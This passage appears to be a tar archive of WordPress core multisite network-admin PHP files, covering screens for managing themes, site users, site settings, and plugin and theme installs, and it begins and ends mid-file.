deleted since the option was last updated. $auto_updates = array_intersect( $auto_updates, array_keys( $all_items ) ); update_site_option( 'auto_update_themes', $auto_updates ); wp_safe_redirect( $referer ); exit; default: $themes = isset( $_POST['checked'] ) ? (array) $_POST['checked'] : array(); if ( empty( $themes ) ) { wp_safe_redirect( add_query_arg( 'error', 'none', $referer ) ); exit; } check_admin_referer( 'bulk-themes' ); /** This action is documented in wp-admin/network/site-themes.php */ $referer = apply_filters( 'handle_network_bulk_actions-' . get_current_screen()->id, $referer, $action, $themes ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores wp_safe_redirect( $referer ); exit; } } $wp_list_table->prepare_items(); add_thickbox(); add_screen_option( 'per_page' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen enables and disables the inclusion of themes available to choose in the Appearance menu for each site. It does not activate or deactivate which theme a site is currently using.' ) . '</p>' . '<p>' . __( 'If the network admin disables a theme that is in use, it can still remain selected on that site. If another theme is chosen, the disabled theme will not appear in the site’s Appearance > Themes screen.' ) . '</p>' . '<p>' . __( 'Themes can be enabled on a site by site basis by the network admin on the Edit Site screen (which has a Themes tab); get there via the Edit action link on the All Sites screen. Only network admins are able to install or edit themes.' ) . '</p>', ) ); $help_sidebar_autoupdates = ''; if ( current_user_can( 'update_themes' ) && wp_is_auto_update_enabled_for_type( 'theme' ) ) { get_current_screen()->add_help_tab( array( 'id' => 'plugins-themes-auto-updates', 'title' => __( 'Auto-updates' ), 'content' => '<p>' . __( 'Auto-updates can be enabled or disabled for each individual theme. Themes with auto-updates enabled will display the estimated date of the next auto-update. Auto-updates depends on the WP-Cron task scheduling system.' ) . '</p>' . '<p>' . __( 'Please note: Third-party themes and plugins, or custom code, may override WordPress scheduling.' ) . '</p>', ) ); $help_sidebar_autoupdates = '<p>' . __( '<a href="https://wordpress.org/documentation/article/plugins-themes-auto-updates/">Documentation on Auto-updates</a>' ) . '</p>'; } get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://codex.wordpress.org/Network_Admin_Themes_Screen">Documentation on Network Themes</a>' ) . '</p>' . $help_sidebar_autoupdates . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter themes list' ), 'heading_pagination' => __( 'Themes list navigation' ), 'heading_list' => __( 'Themes list' ), ) ); // Used in the HTML title tag. $title = __( 'Themes' ); $parent_file = 'themes.php'; wp_enqueue_script( 'updates' ); wp_enqueue_script( 'theme-preview' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 class="wp-heading-inline"><?php echo esc_html( $title ); ?></h1> <?php if ( current_user_can( 'install_themes' ) ) : ?> <a href="theme-install.php" class="page-title-action"><?php echo esc_html__( 'Add Theme' ); ?></a> <?php endif; ?> <?php if ( isset( $_REQUEST['s'] ) && strlen( $_REQUEST['s'] ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( $s ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php $message = ''; $type = 'success'; if ( isset( $_GET['enabled'] ) ) { $enabled = absint( $_GET['enabled'] ); if ( 1 === $enabled ) { $message = __( 'Theme enabled.' ); } else { $message = sprintf( /* translators: %s: Number of themes. */ _n( '%s theme enabled.', '%s themes enabled.', $enabled ), number_format_i18n( $enabled ) ); } } elseif ( isset( $_GET['disabled'] ) ) { $disabled = absint( $_GET['disabled'] ); if ( 1 === $disabled ) { $message = __( 'Theme disabled.' ); } else { $message = sprintf( /* translators: %s: Number of themes. */ _n( '%s theme disabled.', '%s themes disabled.', $disabled ), number_format_i18n( $disabled ) ); } } elseif ( isset( $_GET['deleted'] ) ) { $deleted = absint( $_GET['deleted'] ); if ( 1 === $deleted ) { $message = __( 'Theme deleted.' ); } else { $message = sprintf( /* translators: %s: Number of themes. */ _n( '%s theme deleted.', '%s themes deleted.', $deleted ), number_format_i18n( $deleted ) ); } } elseif ( isset( $_GET['enabled-auto-update'] ) ) { $enabled = absint( $_GET['enabled-auto-update'] ); if ( 1 === $enabled ) { $message = __( 'Theme will be auto-updated.' ); } else { $message = sprintf( /* translators: %s: Number of themes. */ _n( '%s theme will be auto-updated.', '%s themes will be auto-updated.', $enabled ), number_format_i18n( $enabled ) ); } } elseif ( isset( $_GET['disabled-auto-update'] ) ) { $disabled = absint( $_GET['disabled-auto-update'] ); if ( 1 === $disabled ) { $message = __( 'Theme will no longer be auto-updated.' ); } else { $message = sprintf( /* translators: %s: Number of themes. */ _n( '%s theme will no longer be auto-updated.', '%s themes will no longer be auto-updated.', $disabled ), number_format_i18n( $disabled ) ); } } elseif ( isset( $_GET['error'] ) && 'none' === $_GET['error'] ) { $message = __( 'No theme selected.' ); $type = 'error'; } elseif ( isset( $_GET['error'] ) && 'main' === $_GET['error'] ) { $message = __( 'You cannot delete a theme while it is active on the main site.' ); $type = 'error'; } if ( '' !== $message ) { wp_admin_notice( $message, array( 'type' => $type, 'dismissible' => true, 'id' => 'message', ) ); } ?> <form method="get"> <?php $wp_list_table->search_box( __( 'Search installed themes' ), 'theme' ); ?> </form> <?php $wp_list_table->views(); if ( 'broken' === $status ) { echo '<p class="clear">' . __( 'The following themes are installed but incomplete.' ) . '</p>'; } ?> <form id="bulk-action-form" method="post"> <input type="hidden" name="theme_status" value="<?php echo esc_attr( $status ); ?>" /> <input type="hidden" name="paged" value="<?php echo esc_attr( $page ); ?>" /> <?php $wp_list_table->display(); ?> </form> </div> <?php wp_print_request_filesystem_credentials_modal(); wp_print_admin_notice_templates(); wp_print_update_row_templates(); require_once ABSPATH . 'wp-admin/admin-footer.php'; network/theme-install.php 0000644 00000000566 15226322564 0011532 0 ustar 00 <?php /** * Install theme network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ if ( isset( $_GET['tab'] ) && ( 'theme-information' === $_GET['tab'] ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/theme-install.php'; network/site-users.php 0000644 00000027013 15226322564 0011063 0 ustar 00 <?php /** * Edit Site Users Administration Screen * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to edit this site.' ), 403 ); } $wp_list_table = _get_list_table( 'WP_Users_List_Table' ); $wp_list_table->prepare_items(); get_current_screen()->add_help_tab( get_site_screen_help_tab_args() ); get_current_screen()->set_help_sidebar( get_site_screen_help_sidebar_content() ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter site users list' ), 'heading_pagination' => __( 'Site users list navigation' ), 'heading_list' => __( 'Site users list' ), ) ); $_SERVER['REQUEST_URI'] = remove_query_arg( 'update', $_SERVER['REQUEST_URI'] ); $referer = remove_query_arg( 'update', wp_get_referer() ); if ( ! empty( $_REQUEST['paged'] ) ) { $referer = add_query_arg( 'paged', (int) $_REQUEST['paged'], $referer ); } $id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; if ( ! $id ) { wp_die( __( 'Invalid site ID.' ) ); } $details = get_site( $id ); if ( ! $details ) { wp_die( __( 'The requested site does not exist.' ) ); } if ( ! can_edit_network( $details->site_id ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $is_main_site = is_main_site( $id ); switch_to_blog( $id ); $action = $wp_list_table->current_action(); if ( $action ) { switch ( $action ) { case 'newuser': check_admin_referer( 'add-user', '_wpnonce_add-new-user' ); $user = $_POST['user']; if ( ! is_array( $_POST['user'] ) || empty( $user['username'] ) || empty( $user['email'] ) ) { $update = 'err_new'; } else { $password = wp_generate_password( 12, false ); $user_id = wpmu_create_user( esc_html( strtolower( $user['username'] ) ), $password, esc_html( $user['email'] ) ); if ( false === $user_id ) { $update = 'err_new_dup'; } else { $result = add_user_to_blog( $id, $user_id, $_POST['new_role'] ); if ( is_wp_error( $result ) ) { $update = 'err_add_fail'; } else { $update = 'newuser'; /** * Fires after a user has been created via the network site-users.php page. * * @since 4.4.0 * * @param int $user_id ID of the newly created user. */ do_action( 'network_site_users_created_user', $user_id ); } } } break; case 'adduser': check_admin_referer( 'add-user', '_wpnonce_add-user' ); if ( ! empty( $_POST['newuser'] ) ) { $update = 'adduser'; $newuser = $_POST['newuser']; $user = get_user_by( 'login', $newuser ); if ( $user && $user->exists() ) { if ( ! is_user_member_of_blog( $user->ID, $id ) ) { $result = add_user_to_blog( $id, $user->ID, $_POST['new_role'] ); if ( is_wp_error( $result ) ) { $update = 'err_add_fail'; } } else { $update = 'err_add_member'; } } else { $update = 'err_add_notfound'; } } else { $update = 'err_add_notfound'; } break; case 'remove': if ( ! current_user_can( 'remove_users' ) ) { wp_die( __( 'Sorry, you are not allowed to remove users.' ), 403 ); } check_admin_referer( 'bulk-users' ); $update = 'remove'; if ( isset( $_REQUEST['users'] ) ) { $userids = $_REQUEST['users']; foreach ( $userids as $user_id ) { $user_id = (int) $user_id; remove_user_from_blog( $user_id, $id ); } } elseif ( isset( $_GET['user'] ) ) { remove_user_from_blog( $_GET['user'] ); } else { $update = 'err_remove'; } break; case 'promote': check_admin_referer( 'bulk-users' ); if ( ! current_user_can( 'promote_users' ) ) { wp_die( __( 'Sorry, you are not allowed to edit this user.' ), 403 ); } $editable_roles = get_editable_roles(); $role = $_REQUEST['new_role']; // Mock `none` as editable role. $editable_roles['none'] = array( 'name' => __( '— No role for this site —' ), ); if ( empty( $editable_roles[ $role ] ) ) { wp_die( __( 'Sorry, you are not allowed to give users that role.' ), 403 ); } if ( 'none' === $role ) { $role = ''; } if ( isset( $_REQUEST['users'] ) ) { $userids = $_REQUEST['users']; $update = 'promote'; foreach ( $userids as $user_id ) { $user_id = (int) $user_id; if ( ! current_user_can( 'promote_user', $user_id ) ) { wp_die( __( 'Sorry, you are not allowed to edit this user.' ), 403 ); } // If the user doesn't already belong to the blog, bail. if ( ! is_user_member_of_blog( $user_id ) ) { wp_die( '<h1>' . __( 'An error occurred.' ) . '</h1>' . '<p>' . __( 'One of the selected users is not a member of this site.' ) . '</p>', 403 ); } $user = get_userdata( $user_id ); // If $role is empty, none will be set. $user->set_role( $role ); } } else { $update = 'err_promote'; } break; default: if ( ! isset( $_REQUEST['users'] ) ) { break; } check_admin_referer( 'bulk-users' ); $userids = $_REQUEST['users']; /** This action is documented in wp-admin/network/site-themes.php */ $referer = apply_filters( 'handle_network_bulk_actions-' . get_current_screen()->id, $referer, $action, $userids, $id ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores $update = $action; break; } wp_safe_redirect( add_query_arg( 'update', $update, $referer ) ); exit; } restore_current_blog(); if ( isset( $_GET['action'] ) && 'update-site' === $_GET['action'] ) { wp_safe_redirect( $referer ); exit; } add_screen_option( 'per_page' ); // Used in the HTML title tag. /* translators: %s: Site title. */ $title = sprintf( __( 'Edit Site: %s' ), esc_html( $details->blogname ) ); $parent_file = 'sites.php'; $submenu_file = 'sites.php'; /** * Filters whether to show the Add Existing User form on the Multisite Users screen. * * @since 3.1.0 * * @param bool $bool Whether to show the Add Existing User form. Default true. */ if ( ! wp_is_large_network( 'users' ) && apply_filters( 'show_network_site_users_add_existing_form', true ) ) { wp_enqueue_script( 'user-suggest' ); } require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <script> var current_site_id = <?php echo absint( $id ); ?>; </script> <div class="wrap"> <h1 id="edit-site"><?php echo $title; ?></h1> <p class="edit-site-actions"><a href="<?php echo esc_url( get_home_url( $id, '/' ) ); ?>"><?php _e( 'Visit' ); ?></a> | <a href="<?php echo esc_url( get_admin_url( $id ) ); ?>"><?php _e( 'Dashboard' ); ?></a></p> <?php network_edit_site_nav( array( 'blog_id' => $id, 'selected' => 'site-users', ) ); if ( isset( $_GET['update'] ) ) : $message = ''; $type = 'error'; switch ( $_GET['update'] ) { case 'adduser': $type = 'success'; $message = __( 'User added.' ); break; case 'err_add_member': $message = __( 'User is already a member of this site.' ); break; case 'err_add_fail': $message = __( 'User could not be added to this site.' ); break; case 'err_add_notfound': $message = __( 'Enter the username of an existing user.' ); break; case 'promote': $type = 'success'; $message = __( 'Changed roles.' ); break; case 'err_promote': $message = __( 'Select a user to change role.' ); break; case 'remove': $type = 'success'; $message = __( 'User removed from this site.' ); break; case 'err_remove': $message = __( 'Select a user to remove.' ); break; case 'newuser': $type = 'success'; $message = __( 'User created.' ); break; case 'err_new': $message = __( 'Enter the username and email.' ); break; case 'err_new_dup': $message = __( 'Duplicated username or email address.' ); break; } wp_admin_notice( $message, array( 'type' => $type, 'dismissible' => true, 'id' => 'message', ) ); endif; ?> <form class="search-form" method="get"> <?php $wp_list_table->search_box( __( 'Search Users' ), 'user' ); ?> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> </form> <?php $wp_list_table->views(); ?> <form method="post" action="site-users.php?action=update-site"> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <?php $wp_list_table->display(); ?> </form> <?php /** * Fires after the list table on the Users screen in the Multisite Network Admin. * * @since 3.1.0 */ do_action( 'network_site_users_after_list_table' ); /** This filter is documented in wp-admin/network/site-users.php */ if ( current_user_can( 'promote_users' ) && apply_filters( 'show_network_site_users_add_existing_form', true ) ) : ?> <h2 id="add-existing-user"><?php _e( 'Add Existing User' ); ?></h2> <form action="site-users.php?action=adduser" id="adduser" method="post"> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="newuser"><?php _e( 'Username' ); ?></label></th> <td><input type="text" class="regular-text wp-suggest-user" name="newuser" id="newuser" /></td> </tr> <tr> <th scope="row"><label for="new_role_adduser"><?php _e( 'Role' ); ?></label></th> <td><select name="new_role" id="new_role_adduser"> <?php switch_to_blog( $id ); wp_dropdown_roles( get_option( 'default_role' ) ); restore_current_blog(); ?> </select></td> </tr> </table> <?php wp_nonce_field( 'add-user', '_wpnonce_add-user' ); ?> <?php submit_button( __( 'Add User' ), 'primary', 'add-user', true, array( 'id' => 'submit-add-existing-user' ) ); ?> </form> <?php endif; ?> <?php /** * Filters whether to show the Add New User form on the Multisite Users screen. * * Note: While WordPress is moving towards simplifying labels by removing "New" from "Add New X" labels, * we keep "Add New User" here to maintain a clear distinction from the "Add Existing User" section above. * * @since 3.1.0 * * @param bool $bool Whether to show the Add New User form. Default true. */ if ( current_user_can( 'create_users' ) && apply_filters( 'show_network_site_users_add_new_form', true ) ) : ?> <h2 id="add-new-user"><?php _e( 'Add New User' ); ?></h2> <form action="<?php echo esc_url( network_admin_url( 'site-users.php?action=newuser' ) ); ?>" id="newuser" method="post"> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="user_username"><?php _e( 'Username' ); ?></label></th> <td><input type="text" class="regular-text ltr" name="user[username]" id="user_username" /></td> </tr> <tr> <th scope="row"><label for="user_email"><?php _e( 'Email' ); ?></label></th> <td><input type="text" class="regular-text ltr" name="user[email]" id="user_email" /></td> </tr> <tr> <th scope="row"><label for="new_role_newuser"><?php _e( 'Role' ); ?></label></th> <td><select name="new_role" id="new_role_newuser"> <?php switch_to_blog( $id ); wp_dropdown_roles( get_option( 'default_role' ) ); restore_current_blog(); ?> </select></td> </tr> <tr class="form-field"> <td colspan="2" class="td-full"><?php _e( 'A password reset link will be sent to the user via email.' ); ?></td> </tr> </table> <?php wp_nonce_field( 'add-user', '_wpnonce_add-new-user' ); ?> <?php submit_button( __( 'Add User' ), 'primary', 'add-user', true, array( 'id' => 'submit-add-user' ) ); ?> </form> <?php endif; ?> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; network/user-edit.php 0000644 00000000375 15226322564 0010663 0 ustar 00 <?php /** * Edit user network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/user-edit.php'; network/site-themes.php 0000644 00000015302 15226322564 0011205 0 ustar 00 <?php /** * Edit Site Themes Administration Screen * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to manage themes for this site.' ) ); } get_current_screen()->add_help_tab( get_site_screen_help_tab_args() ); get_current_screen()->set_help_sidebar( get_site_screen_help_sidebar_content() ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter site themes list' ), 'heading_pagination' => __( 'Site themes list navigation' ), 'heading_list' => __( 'Site themes list' ), ) ); $wp_list_table = _get_list_table( 'WP_MS_Themes_List_Table' ); $action = $wp_list_table->current_action(); $s = $_REQUEST['s'] ?? ''; // Clean up request URI from temporary args for screen options/paging uri's to work as expected. $temp_args = array( 'enabled', 'disabled', 'error' ); $_SERVER['REQUEST_URI'] = remove_query_arg( $temp_args, $_SERVER['REQUEST_URI'] ); $referer = remove_query_arg( $temp_args, wp_get_referer() ); if ( ! empty( $_REQUEST['paged'] ) ) { $referer = add_query_arg( 'paged', (int) $_REQUEST['paged'], $referer ); } $id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; if ( ! $id ) { wp_die( __( 'Invalid site ID.' ) ); } $wp_list_table->prepare_items(); $details = get_site( $id ); if ( ! $details ) { wp_die( __( 'The requested site does not exist.' ) ); } if ( ! can_edit_network( $details->site_id ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $is_main_site = is_main_site( $id ); if ( $action ) { switch_to_blog( $id ); $allowed_themes = get_option( 'allowedthemes' ); switch ( $action ) { case 'enable': check_admin_referer( 'enable-theme_' . $_GET['theme'] ); $theme = $_GET['theme']; $action = 'enabled'; $n = 1; if ( ! $allowed_themes ) { $allowed_themes = array( $theme => true ); } else { $allowed_themes[ $theme ] = true; } break; case 'disable': check_admin_referer( 'disable-theme_' . $_GET['theme'] ); $theme = $_GET['theme']; $action = 'disabled'; $n = 1; if ( ! $allowed_themes ) { $allowed_themes = array(); } else { unset( $allowed_themes[ $theme ] ); } break; case 'enable-selected': check_admin_referer( 'bulk-themes' ); if ( isset( $_POST['checked'] ) ) { $themes = (array) $_POST['checked']; $action = 'enabled'; $n = count( $themes ); foreach ( (array) $themes as $theme ) { $allowed_themes[ $theme ] = true; } } else { $action = 'error'; $n = 'none'; } break; case 'disable-selected': check_admin_referer( 'bulk-themes' ); if ( isset( $_POST['checked'] ) ) { $themes = (array) $_POST['checked']; $action = 'disabled'; $n = count( $themes ); foreach ( (array) $themes as $theme ) { unset( $allowed_themes[ $theme ] ); } } else { $action = 'error'; $n = 'none'; } break; default: if ( isset( $_POST['checked'] ) ) { check_admin_referer( 'bulk-themes' ); $themes = (array) $_POST['checked']; $n = count( $themes ); $screen = get_current_screen()->id; /** * Fires when a custom bulk action should be handled. * * The redirect link should be modified with success or failure feedback * from the action to be used to display feedback to the user. * * The dynamic portion of the hook name, `$screen`, refers to the current screen ID. * * @since 4.7.0 * * @param string $redirect_url The redirect URL. * @param string $action The action being taken. * @param array $items The items to take the action on. * @param int $site_id The site ID. */ $referer = apply_filters( "handle_network_bulk_actions-{$screen}", $referer, $action, $themes, $id ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } else { $action = 'error'; $n = 'none'; } } update_option( 'allowedthemes', $allowed_themes, false ); restore_current_blog(); wp_safe_redirect( add_query_arg( array( 'id' => $id, $action => $n, ), $referer ) ); exit; } if ( isset( $_GET['action'] ) && 'update-site' === $_GET['action'] ) { wp_safe_redirect( $referer ); exit; } add_thickbox(); add_screen_option( 'per_page' ); // Used in the HTML title tag. /* translators: %s: Site title. */ $title = sprintf( __( 'Edit Site: %s' ), esc_html( $details->blogname ) ); $parent_file = 'sites.php'; $submenu_file = 'sites.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 id="edit-site"><?php echo $title; ?></h1> <p class="edit-site-actions"><a href="<?php echo esc_url( get_home_url( $id, '/' ) ); ?>"><?php _e( 'Visit' ); ?></a> | <a href="<?php echo esc_url( get_admin_url( $id ) ); ?>"><?php _e( 'Dashboard' ); ?></a></p> <?php network_edit_site_nav( array( 'blog_id' => $id, 'selected' => 'site-themes', ) ); if ( isset( $_GET['enabled'] ) ) { $enabled = absint( $_GET['enabled'] ); if ( 1 === $enabled ) { $message = __( 'Theme enabled.' ); } else { /* translators: %s: Number of themes. */ $message = _n( '%s theme enabled.', '%s themes enabled.', $enabled ); } wp_admin_notice( sprintf( $message, number_format_i18n( $enabled ) ), array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } elseif ( isset( $_GET['disabled'] ) ) { $disabled = absint( $_GET['disabled'] ); if ( 1 === $disabled ) { $message = __( 'Theme disabled.' ); } else { /* translators: %s: Number of themes. */ $message = _n( '%s theme disabled.', '%s themes disabled.', $disabled ); } wp_admin_notice( sprintf( $message, number_format_i18n( $disabled ) ), array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } elseif ( isset( $_GET['error'] ) && 'none' === $_GET['error'] ) { wp_admin_notice( __( 'No theme selected.' ), array( 'type' => 'error', 'dismissible' => true, 'id' => 'message', ) ); } ?> <p><?php _e( 'Network enabled themes are not shown on this screen.' ); ?></p> <form method="get"> <?php $wp_list_table->search_box( __( 'Search installed themes' ), 'theme' ); ?> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> </form> <?php $wp_list_table->views(); ?> <form method="post" action="site-themes.php?action=update-site"> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <?php $wp_list_table->display(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> network/plugin-install.php 0000644 00000000571 15226322564 0011722 0 ustar 00 <?php /** * Install plugin network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ if ( isset( $_GET['tab'] ) && ( 'plugin-information' === $_GET['tab'] ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/plugin-install.php'; network/admin.php 0000644 00000002000 15226322564 0010035 0 ustar 00 <?php /** * WordPress Network Administration Bootstrap * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ define( 'WP_NETWORK_ADMIN', true ); /** Load WordPress Administration Bootstrap */ require_once dirname( __DIR__ ) . '/admin.php'; // Do not remove this check. It is required by individual network admin pages. if ( ! is_multisite() ) { wp_die( __( 'Multisite support is not enabled.' ) ); } $redirect_network_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) ); /** * Filters whether to redirect the request to the Network Admin. * * @since 3.2.0 * * @param bool $redirect_network_admin_request Whether the request should be redirected. */ $redirect_network_admin_request = apply_filters( 'redirect_network_admin_request', $redirect_network_admin_request ); if ( $redirect_network_admin_request ) { wp_redirect( network_admin_url() ); exit; } unset( $redirect_network_admin_request ); network/site-settings.php 0000644 00000013537 15226322564 0011570 0 ustar 00 <?php /** * Edit Site Settings Administration Screen * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to edit this site.' ) ); } get_current_screen()->add_help_tab( get_site_screen_help_tab_args() ); get_current_screen()->set_help_sidebar( get_site_screen_help_sidebar_content() ); $id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; if ( ! $id ) { wp_die( __( 'Invalid site ID.' ) ); } $details = get_site( $id ); if ( ! $details ) { wp_die( __( 'The requested site does not exist.' ) ); } if ( ! can_edit_network( $details->site_id ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $is_main_site = is_main_site( $id ); if ( isset( $_REQUEST['action'] ) && 'update-site' === $_REQUEST['action'] && is_array( $_POST['option'] ) ) { check_admin_referer( 'edit-site' ); switch_to_blog( $id ); $skip_options = array( 'allowedthemes' ); // Don't update these options since they are handled elsewhere in the form. foreach ( (array) $_POST['option'] as $key => $val ) { $key = wp_unslash( $key ); $val = wp_unslash( $val ); if ( 0 === $key || is_array( $val ) || in_array( $key, $skip_options, true ) ) { continue; // Avoids "0 is a protected WP option and may not be modified" error when editing blog options. } update_option( $key, $val ); } /** * Fires after the site options are updated. * * @since 3.0.0 * @since 4.4.0 Added `$id` parameter. * * @param int $id The ID of the site being updated. */ do_action( 'wpmu_update_blog_options', $id ); restore_current_blog(); wp_redirect( add_query_arg( array( 'update' => 'updated', 'id' => $id, ), 'site-settings.php' ) ); exit; } if ( isset( $_GET['update'] ) ) { $messages = array(); if ( 'updated' === $_GET['update'] ) { $messages[] = __( 'Site options updated.' ); } } // Used in the HTML title tag. /* translators: %s: Site title. */ $title = sprintf( __( 'Edit Site: %s' ), esc_html( $details->blogname ) ); $parent_file = 'sites.php'; $submenu_file = 'sites.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 id="edit-site"><?php echo $title; ?></h1> <p class="edit-site-actions"><a href="<?php echo esc_url( get_home_url( $id, '/' ) ); ?>"><?php _e( 'Visit' ); ?></a> | <a href="<?php echo esc_url( get_admin_url( $id ) ); ?>"><?php _e( 'Dashboard' ); ?></a></p> <?php network_edit_site_nav( array( 'blog_id' => $id, 'selected' => 'site-settings', ) ); if ( ! empty( $messages ) ) { $notice_args = array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ); foreach ( $messages as $msg ) { wp_admin_notice( $msg, $notice_args ); } } ?> <form method="post" action="site-settings.php?action=update-site"> <?php wp_nonce_field( 'edit-site' ); ?> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <table class="form-table" role="presentation"> <?php $blog_prefix = $wpdb->get_blog_prefix( $id ); $options = $wpdb->get_results( $wpdb->prepare( 'SELECT * FROM %i WHERE option_name NOT LIKE %s AND option_name NOT LIKE %s', "{$blog_prefix}options", $wpdb->esc_like( '_' ) . '%', '%' . $wpdb->esc_like( 'user_roles' ) ) ); foreach ( $options as $option ) { if ( 'default_role' === $option->option_name ) { $editblog_default_role = $option->option_value; } $disabled = false; $class = 'all-options'; if ( is_serialized( $option->option_value ) ) { if ( is_serialized_string( $option->option_value ) ) { $option->option_value = esc_html( maybe_unserialize( $option->option_value ) ); } else { $option->option_value = 'SERIALIZED DATA'; $disabled = true; $class = 'all-options disabled'; } } $ltr_fields = array( 'siteurl', 'home', 'admin_email', 'new_admin_email', 'mailserver_url', 'mailserver_login', 'mailserver_pass', 'ping_sites', 'permalink_structure', 'category_base', 'tag_base', 'upload_path', 'upload_url_path', ); if ( in_array( $option->option_name, $ltr_fields, true ) ) { $class .= ' ltr'; } if ( str_contains( $option->option_value, "\n" ) ) { ?> <tr class="form-field"> <th scope="row"><label for="<?php echo esc_attr( $option->option_name ); ?>" class="code"><?php echo esc_html( $option->option_name ); ?></label></th> <td><textarea class="<?php echo $class; ?>" rows="5" cols="40" name="option[<?php echo esc_attr( $option->option_name ); ?>]" id="<?php echo esc_attr( $option->option_name ); ?>"<?php disabled( $disabled ); ?>><?php echo esc_textarea( $option->option_value ); ?></textarea></td> </tr> <?php } else { ?> <tr class="form-field"> <th scope="row"><label for="<?php echo esc_attr( $option->option_name ); ?>" class="code"><?php echo esc_html( $option->option_name ); ?></label></th> <?php if ( $is_main_site && in_array( $option->option_name, array( 'siteurl', 'home' ), true ) ) { ?> <td><code><?php echo esc_html( $option->option_value ); ?></code></td> <?php } else { ?> <td><input class="<?php echo $class; ?>" name="option[<?php echo esc_attr( $option->option_name ); ?>]" type="text" id="<?php echo esc_attr( $option->option_name ); ?>" value="<?php echo esc_attr( $option->option_value ); ?>" size="40" <?php disabled( $disabled ); ?> /></td> <?php } ?> </tr> <?php } } // End foreach. /** * Fires at the end of the Edit Site form, before the submit button. * * @since 3.0.0 * * @param int $id Site ID. */ do_action( 'wpmueditblogaction', $id ); ?> </table> <?php submit_button(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; network/privacy.php 0000644 00000000371 15226322564 0010433 0 ustar 00 <?php /** * Network Privacy administration panel. * * @package WordPress * @subpackage Multisite * @since 4.9.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/privacy.php'; network/plugin-editor.php 0000644 00000000412 15226322564 0011534 0 ustar 00 <?php /** * Plugin file editor network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/plugin-editor.php'; network/users.php 0000644 00000024543 15226322564 0010126 0 ustar 00 <?php /** * Multisite users administration panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_network_users' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } if ( isset( $_GET['action'] ) ) { /** This action is documented in wp-admin/network/edit.php */ do_action( 'wpmuadminedit' ); switch ( $_GET['action'] ) { case 'deleteuser': if ( ! current_user_can( 'manage_network_users' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } check_admin_referer( 'deleteuser' ); $id = (int) 